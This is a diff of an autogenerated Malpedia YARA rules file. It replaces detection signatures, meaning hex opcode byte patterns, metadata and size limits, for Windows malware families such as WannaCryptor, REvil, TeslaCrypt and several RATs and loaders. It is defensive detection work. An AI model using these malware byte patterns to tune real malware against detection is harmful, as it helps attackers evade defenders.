+		$sequence_2 = { 57 8d4dec c645fc02 e8???????? 85c0 0f8e95000000 57 }
+		$sequence_3 = { 7412 ff7508 8d4e08 50 e8???????? 8b450c 894624 }
+		$sequence_4 = { 6aff 57 68???????? 8d4de4 e8???????? 8bce e8???????? }
+		$sequence_5 = { e8???????? 8d45ec 68???????? 50 e8???????? 83c41c 8d45ec }
+		$sequence_6 = { e8???????? 57 e8???????? 59 55 8d4b20 }
+		$sequence_7 = { 8bc8 c1e910 c1e818 880a 33ff 897514 8b4d14 }
+		$sequence_8 = { 8b06 8365fc00 8bce b301 ff5010 3d04000102 }
+		$sequence_9 = { eb34 68???????? 57 ffd6 59 85c0 59 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Valley_Rat_Auto : FILE
+rule MALPEDIA_Win_Sepulcher_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e31e391b-1d98-571d-b2e1-793b94f7ca99"
+		id = "802dcce7-e6b4-5d4a-a31c-1fbaf1e1892c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.valley_rat_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sepulcher_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "4fd91bc63ffea1277d480fd520807726f4547d3a7eff2043dfcadcbba2a797a7"
-		score = 60
-		quality = 45
+		logic_hash = "5e68d8ea35ea7e66861512d33b8203bcd0ab7d3eb1395ac8fae23afff0a1b2a5"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -124431,38 +124313,32 @@ rule MALPEDIA_Win_Valley_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 005c7e46 00847e46008a46 0323 d188470383ee }
-		$sequence_1 = { c785dcfbffff9b9bcc64 c785e0fbffffee6364c8 c785e4fbffff97f1dbf3 c785e8fbffff9bab9b9b c785ecfbffff25539b9b c785f0fbffff9bcdcc64 }
-		$sequence_2 = { 897e48 897e40 897e44 89464c 8d442408 }
-		$sequence_3 = { 0101 0505050505 0505050505 0505050505 0505050505 0505050505 }
-		$sequence_4 = { 51 8d93440a0000 52 e8???????? 83c40c }
-		$sequence_5 = { 0101 0101 0201 0102 }
-		$sequence_6 = { 0101 0101 0101 0101 0101 0505050505 }
-		$sequence_7 = { 0001 0101 0102 0101 }
-		$sequence_8 = { c78530feffff73cacd64 c78534feffffce97707a c78538fefffffefffee9 c7853cfefffff7f4f8f0 c78540feffff9b9b9b9b c78544feffff9b9b9b9b c78548feffff9b9b9b9b }
-		$sequence_9 = { 0101 33c0 5e 5b }
-		$sequence_10 = { 8b15???????? 6800300000 52 50 ff15???????? 8b0d???????? 51 }
-		$sequence_11 = { c785c0f6ffff8173599d c785c4f6ffff9b9bcbf3 c785c8f6ffffe384bbe4 c785ccf6ffff12dfbfab }
-		$sequence_12 = { e8???????? 8b0d???????? 83c418 890d???????? 891d???????? }
-		$sequence_13 = { 00bcaf4500c5af 45 00f8 af }
-		$sequence_14 = { c785e8f7ffffdf10dfbf c785ecf7ffffe7f1dbcd c785f0f7ffff64ebb7c8 c785f4f7ffff64cfbfa3 c785f8f7ffff10d7bfe7 c785fcf7ffff121fbf13 c78500f8ffff9b9b9b64 }
-		$sequence_15 = { 0101 33c0 8be5 5d }
+		$sequence_0 = { 6828080000 33ff 8d85ccf7ffff 57 50 }
+		$sequence_1 = { 0fb77124 8b11 668b450c 668944b202 }
+		$sequence_2 = { 56 53 e8???????? 85c0 743d 6a00 }
+		$sequence_3 = { e8???????? 894608 8b857cffffff 6a3c 894620 8d459c 6a00 }
+		$sequence_4 = { 668984247e6e0000 0f1184241c6e0000 c784242c6e000006000000 c78424306e000009000000 }
+		$sequence_5 = { 668975dc 668975e2 668975e4 66c745ac756d c645ae62 8855af }
+		$sequence_6 = { 88043e 46 3c3e 752f 83fe05 7235 }
+		$sequence_7 = { 6a00 8d4df8 51 6a01 8d4dff 51 50 }
+		$sequence_8 = { 8b048550de0110 f644082801 7406 8b440818 5d c3 e8???????? }
+		$sequence_9 = { e8???????? 59 8d8c24a0250000 e8???????? 68f2030000 }
 
 	condition:
-		7 of them and filesize < 2256896
+		7 of them and filesize < 279552
 }
-rule MALPEDIA_Win_Jessiecontea_Auto : FILE
+rule MALPEDIA_Win_Unidentified_121_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ed5d981c-49e8-5f40-808b-1f7fc2ae5113"
+		id = "a6510632-1b9e-5c84-ab89-5f72cc6f435a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jessiecontea_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_121"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_121_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "f376a26e7b2528bac10debe17ecc06d45573d24dcd0617a6c31e158d3d59f89a"
+		logic_hash = "2f8db882acb1a5c7d66a4cbcd4a58ef4e003ccebde890da1f9103b205ffea6c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124476,38 +124352,38 @@ rule MALPEDIA_Win_Jessiecontea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85a8f9ffff 50 8d85f8fbffff 50 ff15???????? }
-		$sequence_1 = { 8b7d18 8945c0 8b4510 8945c4 8b451c }
-		$sequence_2 = { 660fdbe3 660fdfc8 660febe1 3bd6 0f826effffff 660ffee5 0f28c4 }
-		$sequence_3 = { e8???????? 83c418 c7857cf0ffffffffff7f c78580f0ffffffffff7f b8ea650000 c7858cf0ffff00000000 }
-		$sequence_4 = { 50 51 8d8df8f7ffff e8???????? 8d85f8f7ffff 6a5c 50 }
-		$sequence_5 = { 745b 8b35???????? 57 ffd6 3d04010000 7d4b }
-		$sequence_6 = { 83c404 85f6 7425 8bbd7cf4ffff 68???????? }
-		$sequence_7 = { 7f0a 8bb5f0b7ffff 3bfe 7293 }
-		$sequence_8 = { 452be5 488d152b6bfeff 4489642440 0f8574fcffff }
-		$sequence_9 = { 6603c1 0fb70d???????? 0fb7c0 33c8 66898dde000000 }
-		$sequence_10 = { 83c008 668945d8 0fb705???????? 83c008 668945da }
-		$sequence_11 = { 6683c00c 0fb7c8 8b05???????? 33c1 6689459c 8b4580 }
-		$sequence_12 = { 4889542440 488bfa be01000000 ff15???????? }
-		$sequence_13 = { 4889442430 488d4e10 4889442428 4c8bcb }
-		$sequence_14 = { 4533c9 4889742420 4c8d85d0040000 488bcf 488d95e0050000 }
-		$sequence_15 = { 817c2440949dd460 7489 33c0 4c8ba424880b0000 488b9c24800b0000 }
+		$sequence_0 = { 8b55fc 8b421c 2540040000 750c }
+		$sequence_1 = { 8b55fc 8b4218 8945f0 8b4d08 83792800 7405 }
+		$sequence_2 = { 8b55fc 8b421c 50 68???????? 8b4d08 }
+		$sequence_3 = { ff15???????? 4c8d4c2438 488b0d???????? 41b804000000 488d1584810100 89c3 e8???????? }
+		$sequence_4 = { 0f8499000000 41b806000000 ba01000000 b902000000 ffd5 488b5320 }
+		$sequence_5 = { 8b55fc 8b421c 2580000000 740c }
+		$sequence_6 = { 4889d9 48c744245800000000 48c744246000000000 e8???????? 4889d9 ff15???????? }
+		$sequence_7 = { 8944244c 0f85a1000000 83430801 4d89e1 4989e8 }
+		$sequence_8 = { 3c54 0f857e000000 e8???????? 4d85ed ba01000000 752f }
+		$sequence_9 = { 8b55fc 8b4218 99 8bc8 }
+		$sequence_10 = { 85db 0f8589000000 488b5028 4883ea01 4883fafd 777b 4885ed }
+		$sequence_11 = { 7511 8b7004 85f6 7539 488907 48c70300000000 }
+		$sequence_12 = { e8???????? 41f6c404 488b8600010000 4889ae28010000 0f84b7000000 488d5001 483dff000000 }
+		$sequence_13 = { 8b55fc 8b421c 2580020000 8b4df8 }
+		$sequence_14 = { 8b55fc 8b421c 0d80020000 8b4dfc }
+		$sequence_15 = { 8b55fc 8b421c 0d00080000 8b4dfc 89411c e9???????? }
 
 	condition:
-		7 of them and filesize < 413696
+		7 of them and filesize < 2419712
 }
-rule MALPEDIA_Win_Wannacryptor_Auto : FILE
+rule MALPEDIA_Win_Revil_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01aa6919-6be4-5745-a8e3-92d4cccf9097"
+		id = "6d9b3831-9422-59dd-891e-cc56c498429e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wannacryptor_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.revil_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "7ff7fdcfef87dab5f03024d09ebe3e1d6a9751642113edcd42b1cf950ced5962"
+		logic_hash = "5ffcb29efd36b8555dc7beef77a59c8169ca5a939654167ee68e6e55a4f62dd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124521,32 +124397,32 @@ rule MALPEDIA_Win_Wannacryptor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 7403 8b4004 50 8b442428 }
-		$sequence_1 = { c744243802000000 e8???????? 55 8d4c2420 b303 50 51 }
-		$sequence_2 = { 8d7e44 85c0 755f 8b17 8d4c241c 6a01 51 }
-		$sequence_3 = { 7d0d 8b5168 8b7960 03d7 }
-		$sequence_4 = { c644243404 e8???????? 8d4c241c 885c2430 }
-		$sequence_5 = { 8d542418 c744243005000000 8b41f8 8b4e74 2bc1 }
-		$sequence_6 = { 8a02 8bcf 88442418 e8???????? 8b542410 c744243000000000 }
-		$sequence_7 = { c7442430ffffffff e8???????? e9???????? 85c0 754b }
-		$sequence_8 = { 88442418 e8???????? 8b542410 c744243000000000 52 50 8d442420 }
-		$sequence_9 = { 89442418 0f8c42ffffff 8b442438 5f 85c0 }
+		$sequence_0 = { 33f6 6a00 6841db0100 ffb4356cffffff ffb43568ffffff }
+		$sequence_1 = { 50 8d8538feffff 50 ff7508 e8???????? ff7508 e8???????? }
+		$sequence_2 = { 8b80c0000000 8b5d08 8945ec 8b4508 }
+		$sequence_3 = { 0cc0 80c980 880437 884c3701 }
+		$sequence_4 = { 8365d000 807d0f2d 8b75f0 8975f4 7408 83ca02 }
+		$sequence_5 = { 4b 8955f8 e9???????? 837db400 }
+		$sequence_6 = { 8bc2 33437c 33cf 3345fc 894b78 8bcb }
+		$sequence_7 = { 3345e4 89417c 8bce f7d1 8bc2 234ddc }
+		$sequence_8 = { 81ecf0040000 53 56 57 bf90000000 }
+		$sequence_9 = { 57 33db 89b53cffffff 8d8540ffffff 43 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 155794432
 }
-rule MALPEDIA_Win_Sysjoker_Auto : FILE
+rule MALPEDIA_Win_Graftor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b72fee4-7a5b-522c-b325-1510979cb981"
+		id = "138ca116-cc68-528f-bf0e-7fb64c51da51"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sysjoker_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graftor_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "a2a2517e767f1ff0b106f5e891c93f19537f3a0c72ffc8109655f6e04ec30bb0"
+		logic_hash = "a96a22ad70eb991290928c1f214241d1fdeb4091277b5b5fb893f50f8f3393f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124560,34 +124436,34 @@ rule MALPEDIA_Win_Sysjoker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4f24 3b4f18 0f83ad060000 8b4714 46 891488 e9???????? }
-		$sequence_1 = { c745d40f000000 c645c000 c78564ffffff90a34400 e8???????? 8d8558ffffff c78554ffffff90a34400 50 }
-		$sequence_2 = { c78500fdffff00000000 33f6 8b3d???????? 89bde0fcffff 0f1f8000000000 }
-		$sequence_3 = { 0f837a100000 8b8fd8000000 85c9 742f 83bfdc00000008 8d87c8000000 }
-		$sequence_4 = { 0f84aafeffff 8b8d6cffffff 2bca 8bc2 83e1fc 81f900100000 }
-		$sequence_5 = { e8???????? 8b45ec 80780d00 74ae 3975dc 0f845e010000 }
-		$sequence_6 = { 8901 51 8bcc c645fc2a 68???????? e8???????? 8d4dc8 }
-		$sequence_7 = { 0f8714010000 52 51 e8???????? 83c408 c645fc01 8b8d48feffff }
-		$sequence_8 = { 52 8b01 ff5004 51 8bf4 89a5f4fcffff }
-		$sequence_9 = { 8906 c645fc12 e8???????? 83c408 e8???????? 8bc8 85c9 }
+		$sequence_0 = { 393d???????? 7523 8d85fcbfffff 50 57 57 6a29 }
+		$sequence_1 = { 57 e8???????? 85c0 743f 8365fc00 8d45fc 50 }
+		$sequence_2 = { c3 53 8b5e14 57 8bf8 3bdf 771d }
+		$sequence_3 = { 5e 5d c20400 6a50 b8b69f4c00 e8???????? 8b7d10 }
+		$sequence_4 = { e8???????? 6800aa4d00 8db5ecbeffff c645fc04 e8???????? 8b8d58bfffff 33ff }
+		$sequence_5 = { e8???????? 845df0 740b 6a00 53 8d4db8 e8???????? }
+		$sequence_6 = { 741c 50 ff15???????? 85c0 7511 8b4604 3d58b74e00 }
+		$sequence_7 = { c68424a8030000fc 8d84244c020000 8bf4 89a424c4000000 50 e8???????? c68424a8030000fa }
+		$sequence_8 = { e8???????? 83c418 84c0 747f 66d16dc8 0fb745c8 }
+		$sequence_9 = { 897dac e8???????? 660fbe00 6a05 8d53bf 59 }
 
 	condition:
-		7 of them and filesize < 832512
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Strongpity_Auto : FILE
+rule MALPEDIA_Win_Donot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "14bad2bc-8b1c-5604-a8c5-9e952bb2db14"
+		id = "30399a34-f31f-510d-a9cd-b28c8f061e17"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.strongpity_auto.yar#L1-L178"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.donot_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "489b26cd26695d5bf1487fe83576061d12be04bfa204a50dba999c14e24baf44"
-		score = 60
-		quality = 45
+		logic_hash = "b17b58b9afa5bf822376cb1f7c125d224a4976e4d102fc9c5fd48e6d7a73b698"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -124599,38 +124475,32 @@ rule MALPEDIA_Win_Strongpity_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 74b8 6a14 59 }
-		$sequence_1 = { 6a1f 56 ff15???????? 33c0 50 ff7710 }
-		$sequence_2 = { 8b45ec 6a02 5a 663938 750d 49 03c2 }
-		$sequence_3 = { 740d 817df4c8000000 7504 8bc6 }
-		$sequence_4 = { 85ff 7507 33c0 e9???????? b90a020000 33d2 8810 }
-		$sequence_5 = { 83e901 75f8 8bcb 897dd0 c745d404010000 }
-		$sequence_6 = { 7433 53 56 ff15???????? 85c0 7427 53 }
-		$sequence_7 = { 8819 41 83e801 75f8 ff75d0 68???????? }
-		$sequence_8 = { 5e 5d 8d432f 5b 8b4c2418 }
-		$sequence_9 = { 5e 5d 8bc3 5b 83c410 c3 8b464c }
-		$sequence_10 = { 5e 5d b803000000 5b 59 c3 8b06 }
-		$sequence_11 = { 5e 5d 8d431b 5b 8b8c24a8090000 }
-		$sequence_12 = { 5e 5d 8919 33c0 5b 59 }
-		$sequence_13 = { 5e 5d 8bc3 c7826c02000001000000 5b 83c410 }
-		$sequence_14 = { 5e 5d b809000000 5b 83c408 c3 8b4640 }
-		$sequence_15 = { 7410 5f c7866c02000001000000 5e 83c410 c3 }
+		$sequence_0 = { c745fc00000000 8d8d98fdffff 6a00 c78598fdffff00000000 68???????? c785a8fdffff00000000 c785acfdffff0f000000 }
+		$sequence_1 = { 83e63f c1ff06 6bf638 8b04bd187b0410 807c302800 7d3c e8???????? }
+		$sequence_2 = { c785c0fdffff00000000 c785c4fdffff07000000 668985b0fdffff 83fa10 }
+		$sequence_3 = { 8d4904 8a80101c0410 8841fc 83ea01 75ec 47 83eb01 }
+		$sequence_4 = { c78584edffff00000000 c78588edffff0f000000 c68574edffff00 e8???????? 8d8de8edffff c645fc0f 8d5101 }
+		$sequence_5 = { 8d048502000000 0bc1 8bce 50 e8???????? 32c0 e9???????? }
+		$sequence_6 = { c645fc1a 50 e8???????? c645fc1b b8ffffff7f 8b55c8 2bc2 }
+		$sequence_7 = { 83ec18 c645fc06 8d85c8fdffff 8bcc 50 e8???????? 8d8580fdffff }
+		$sequence_8 = { 8d8598fdffff 0f438598fdffff 03f0 56 e8???????? 8b8590fdffff }
+		$sequence_9 = { 7269 81fbffffff3f 7349 8d041b 3dffffff7f 0f8741010000 }
 
 	condition:
-		7 of them and filesize < 999424
+		7 of them and filesize < 626688
 }
-rule MALPEDIA_Win_Krdownloader_Auto : FILE
+rule MALPEDIA_Win_Httpsuploader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8928305b-67d0-5595-b543-162ed3d8a500"
+		id = "96408757-8238-57f6-8412-86b6523d9a84"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.krdownloader_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.httpsuploader_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "b190fd97a74e2ef74cfd54dab7101c2dd88a9538032e0c3b3bee219ca7927a46"
+		logic_hash = "6d3671102275ad7b87147a31f1d30011248bd9c06ff651580514d36fdd35a180"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124644,32 +124514,32 @@ rule MALPEDIA_Win_Krdownloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb26 8b4dfc 034df4 0fb6512c 52 68???????? 8b45f0 }
-		$sequence_1 = { 83ec34 894df8 c745fc00000000 8b450c }
-		$sequence_2 = { c745ec00000000 c745f400000000 c745d810000000 c745e000000000 c745d000000000 c745f800000000 c745e800000000 }
-		$sequence_3 = { 83c40c 8b45f8 50 ff15???????? eb26 }
-		$sequence_4 = { c745fc00000000 6a00 6822020000 ff15???????? }
-		$sequence_5 = { 6a00 6840004004 8d45f4 50 68???????? 68???????? }
-		$sequence_6 = { 83c40c c745f400000000 8d85f4f7ffff 50 8b4dfc 81c1640d0300 }
-		$sequence_7 = { ffd1 8b55fc 83ba540d030000 7415 8b45fc 8b88540d0300 51 }
-		$sequence_8 = { c740040f000000 8b4dfc 51 8b55f8 52 8d85e4ebffff }
-		$sequence_9 = { 50 8d85f0fbffff 50 8b4df8 51 e8???????? }
+		$sequence_0 = { 41b8fe010000 6689bdf0020000 e8???????? 488d8df2040000 }
+		$sequence_1 = { 33c0 488d4c2422 33d2 41b8fe010000 }
+		$sequence_2 = { 458d4103 ba00000080 c744242880000000 4c89ac2498040000 }
+		$sequence_3 = { 03df 3bde 72ad 488b5c2448 488b7c2420 b801000000 4883c428 }
+		$sequence_4 = { ffca 750d 4d85c0 7408 498bc8 e8???????? }
+		$sequence_5 = { 40387598 e9???????? 48895c2408 4889742410 48897c2418 }
+		$sequence_6 = { 48897c2420 895c2440 895c2450 85d2 745e 6666660f1f840000000000 }
+		$sequence_7 = { e8???????? eb40 4c8d2569be0000 488b0d???????? e9???????? 4c8d2566be0000 }
+		$sequence_8 = { e8???????? 488d8de2000000 33d2 41b806020000 6689bde0000000 }
+		$sequence_9 = { 7528 48833d????????00 741e 488d0db1f40000 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 190464
 }
-rule MALPEDIA_Win_Mokes_Auto : FILE
+rule MALPEDIA_Win_Hazy_Load_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b39bf037-fa7d-5a3c-86ca-2ed67b32fce6"
+		id = "24c66e7b-2677-5514-927b-1f5ec58947dd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mokes_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hazy_load"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hazy_load_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "b9e014e60ad1f3bca1bf46f5b4621f6e946c48cba595440a4767fbc6ec5a2bfa"
+		logic_hash = "689a5f8205a52a844de3b9ea93f7ac4cdf01c931efdc00759c5c614c1c72cb27"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124683,32 +124553,32 @@ rule MALPEDIA_Win_Mokes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f30f7f442438 8b442438 3b442428 751e 8b442440 3b442430 7514 }
-		$sequence_1 = { f20f5cd0 f20f58d1 f20f2cca 03c8 8d442430 894c2430 8b4c240c }
-		$sequence_2 = { ffb6c8010000 e8???????? 8b8e0c010000 8b4104 397808 7417 3b7808 }
-		$sequence_3 = { f6450801 56 8bf1 57 8b7e04 7423 8b0d???????? }
-		$sequence_4 = { ff742420 ba04000000 53 8d4a28 e8???????? 8b6c2420 8bf0 }
-		$sequence_5 = { ff5030 8b4004 f780e000000000000200 7404 c6432b01 807c241b00 8b5c2454 }
-		$sequence_6 = { ffd0 83c410 8b74240c 8b542418 8bca 8b7c241c 81c11ff9ef9e }
-		$sequence_7 = { f77e6c 89542420 8b450c 8b7004 807e7000 7407 8bce }
-		$sequence_8 = { ff74240c 889018020000 8b8e5c010000 e8???????? 80be9a02000000 7517 ff7604 }
-		$sequence_9 = { f6c310 7410 83e3ef 8d4c242c 895c2414 e8???????? c7442458ffffffff }
+		$sequence_0 = { 488d542420 442bc7 4803d0 4533c9 }
+		$sequence_1 = { 33d2 488bc8 4c8bf8 e8???????? 4c8bc6 41893f 498d4f08 }
+		$sequence_2 = { 488d35c3aa0100 eb16 488b3b 4885ff }
+		$sequence_3 = { 418be9 48c1f806 488d0db8200100 4183e23f }
+		$sequence_4 = { 4883ec20 8bd9 4c8d0d09c60000 b904000000 4c8d05f5c50000 488d15aeb20000 }
+		$sequence_5 = { 0f848d010000 83cfff 488d2ddf120100 83635000 83632c00 e9???????? }
+		$sequence_6 = { 0fb64201 84c0 744d 0fbec8 83e968 }
+		$sequence_7 = { 83fb08 7cd5 83fb08 0f8522010000 }
+		$sequence_8 = { 4883ec20 488d3d93690100 48393d???????? 742b }
+		$sequence_9 = { ff15???????? 48832300 4883c308 488d0551d50100 }
 
 	condition:
-		7 of them and filesize < 18505728
+		7 of them and filesize < 315392
 }
-rule MALPEDIA_Win_Teslacrypt_Auto : FILE
+rule MALPEDIA_Win_Hui_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9b939144-964e-5aba-aac8-37aa145cbdf7"
+		id = "9d52a9e1-364f-5da9-98e9-94947c68e8f2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.teslacrypt_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hui_loader_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "de3676df661439e8c55092a036c1132b34328a8e3d35af949d4b63145f8cc259"
+		logic_hash = "9aeecb9fd394041a8c28b780fedfdb6f106e3cf0d7d8dbc8dc34058d911e30dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124722,38 +124592,32 @@ rule MALPEDIA_Win_Teslacrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 31f7 897d04 31f9 894d08 }
-		$sequence_1 = { 31f7 89bdc4000000 31f9 898dc8000000 31ca 8995cc000000 89d0 }
-		$sequence_2 = { 31f9 894d08 31ca 89550c 89d0 }
-		$sequence_3 = { 33451c 89453c 51 52 89f2 c1c808 0fb6c8 }
-		$sequence_4 = { 31f7 89bda4000000 31f9 898da8000000 31ca 8995ac000000 89d0 }
-		$sequence_5 = { 3345f4 894514 3345f8 894518 3345fc 89451c 51 }
-		$sequence_6 = { 335d04 334d08 33550c 81ffa0000000 0f8452030000 81ffc0000000 0f84ac010000 }
-		$sequence_7 = { 334500 335d04 8b6c2418 894500 895d04 897508 897d0c }
-		$sequence_8 = { 83fa00 89442418 894c2414 89542410 7d23 8b442410 }
-		$sequence_9 = { 8b54244c 8916 c7460804000000 89442448 ffd1 83ec10 8b4c2448 }
-		$sequence_10 = { 8b442438 c70001000000 8b442428 c70002000000 }
-		$sequence_11 = { 894c243c 74b0 e8???????? 89e1 8901 c74104???????? e8???????? }
-		$sequence_12 = { 8b4c2460 ffd1 83ec08 8944240c }
-		$sequence_13 = { 8b4c2434 8b11 8b742438 29d6 8b7c243c }
-		$sequence_14 = { e8???????? 31c9 89c2 83c218 }
-		$sequence_15 = { 89442408 885c2407 88742406 7428 8b442408 83c001 }
+		$sequence_0 = { 8bc8 83e01f c1f905 56 57 8b348d60e20010 }
+		$sequence_1 = { 83c028 83c12c 4a 75eb b902000000 8d742454 83f901 }
+		$sequence_2 = { 8db604b40010 6a00 50 ff36 e8???????? }
+		$sequence_3 = { 75f8 42 83c628 83fa0a 7ce6 b931000000 33c0 }
+		$sequence_4 = { 68???????? ff15???????? 6a00 6a00 6a00 8bf0 6a04 }
+		$sequence_5 = { 80f95c 7408 8a48ff 48 3acb 75f3 }
+		$sequence_6 = { 56 ff15???????? 8bf8 85ff 7506 50 }
+		$sequence_7 = { 6880000000 6a03 53 6a02 6800000080 68???????? }
+		$sequence_8 = { ffd0 68e8030000 ffd6 8b0d???????? }
+		$sequence_9 = { 6a03 53 6a02 6800000080 68???????? ff15???????? }
 
 	condition:
-		7 of them and filesize < 1187840
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Bolek_Auto : FILE
+rule MALPEDIA_Win_Starcruft_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "69ad8acf-074b-529b-acc6-71dc6d683637"
+		id = "e43c9dba-c687-54c9-a2de-dd0a9a45d60b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bolek_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft"
